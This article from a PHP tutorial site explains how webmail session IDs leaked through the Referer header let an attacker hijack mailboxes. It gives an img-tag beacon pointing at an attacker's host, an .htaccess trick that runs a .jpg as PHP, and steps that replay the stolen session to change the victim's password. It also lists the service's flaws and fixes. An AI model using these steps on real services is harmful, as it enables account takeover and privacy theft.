PHP WEST - A hole in security: postal web-interface. PHP Tutorials, PHP Articles, PHP Scripts, PHP Help, PHP Examples

Index
» Articles
» A hole in security: postal web-interface

«« Prev

A hole in security: postal web-interface

Today I�m going to tell you how you can filch addresses from some web-mails. I said �you can� not �you have to�! Calm down, there will be nothing especial like �tools of a young hacker� in this article. It�s a bare demonstration of PHP-abilities and drawbacks (and the outrageous ones!) of some postal web-interfaces.

Service HotBox.com is described.

The very first testing uncovered that the server is exposed to elementary errors in the filtration of scripts and other dangerous tags but it wasn�t the worse.

As it was mentioned � during the work a user is identified on a random multiciphered identifier (ID) and of course (as I thought) IP and/or cookies. The test proved that I was wrong! Having discovered an ID-value it became possible to enter a mail-box from another address, for instance, after the connection breaking! Even more then this � support of cookies wasn�t necessary (although it wasn�t a problem to find them out by possessing an ability to accomplish script).

In fact, for a non-sanctioned overview of a mail-box it�s enough to install an elementary program which is registering all the addressings to the 80th (or other indicated in the address) port, to send a mail containing an unfiltered tag provoking browser to automatical addressing to the attacker�s machine (for example, by means of a link to an image which is supposed to be placed on the IP-address of a hacker <img src=http://address_of_the_hacker�s_machine:port/anyname.gif width=1 height=1>) and after the victim has entered to read the mail the hacker can view the "Referer:" in the heading of the incoming request!

GET /anyname.gif HTTP/1.0 Referer: http://www.hotbox.ru/message.php?id=b[skip]14cf&index=6&array_index=5 Connection: Keep-Alive ...

The attacker is left only to switch off cookies-support in his browser, enter the address indicated in Referer completely and at the same time �work with mail� (read the mails, set up sending�) until the owner logs out.

If the malefactor hasn�t got a permanent connection to the net he can use holes in the tags� filtration to set up sending by means of scripts� languages (for this he will need to send one more mail containing acknowledgement code).

In fact, it�s possible to make mail-boxes breaking and not to wait for victims occupying the line.

And so we deal with the postal service which

authorizes users with technology which is similar to PHP-sessions
doesn�t validate IP-addresses
doesn�t check contains of html-formatted mails
doesn�t demand validation of changes within system settings

And verification of contains should also include ruthless cutting of all the images which don�t come in attachment but are requested from another address instead. CUT ALL THE IMAGES LIKE THESE!

And like experienced hackers we use Apache+PHP.

1. We send html-formatted letters containing tag <img src=http://www.server.com/picture.jpg> on the different addresses of a mail service. Such letters may contain, for instance, a greeting card.

2. Within the directory with a greeting card we put an .htaccess file with following content:

<Files "picture.jpg"> ForceType application/x-httpd-php </Files>

3. Instead of a greeting card we write file picture.jpg with following code:

<? header("Content-type: image/gif"); include("card.jpg");

4. And the greeting card is put namely into the file card.jpg. ForceType directive within .htaccess makes server handle the jpg-file like PHP-script which displays a picture to the user after the work is finished and so it�s impossible to find out that script has done something. And the script acts in a very simple way � it destructs a variable, extracts the session ID from it and deprives a user of his mail-box at one jump. Nothing happens in the machine of a victim, everything is done on the hacker�s server.

5. The hacker opens a socket with web-mail imitating sending of the system settings form (names of the variables need to be typed by hand), changes the password for the one he needs (and, for example, notifies the author that some mail-box is captured). In order not to arouse suspicion he may form the necessary headers � referrers, user agent and so on.

6. He opens the second socket imitating pressing the �logout� button.

* Socket is a kind of session. In the case given it is the same as the connection between web-server and browser.

THAT�S ALL! THE USER IS DEPRIVED OF HIS MAIL-BOX without having a good look of the picture. The next inscription he will see is something like �invalid password, try one more time�.

So a hole in the mail-service security proves to be a whole door in fact (I�m not talking about Hotbox.com here because it�s covered somehow). Combination of session ID transmission through a link (i.e. available to everyone through the Referrer field) instead of using cookie and absence of IP-address verification gains the malefactor a possibility to catch the mail-box management fast and easily. Image verification doesn�t help here � nothing prevents from inserting into the text of a mail such link pressing which a user transmits session ID to the script. Are any conveniences worth such victims? I guess not.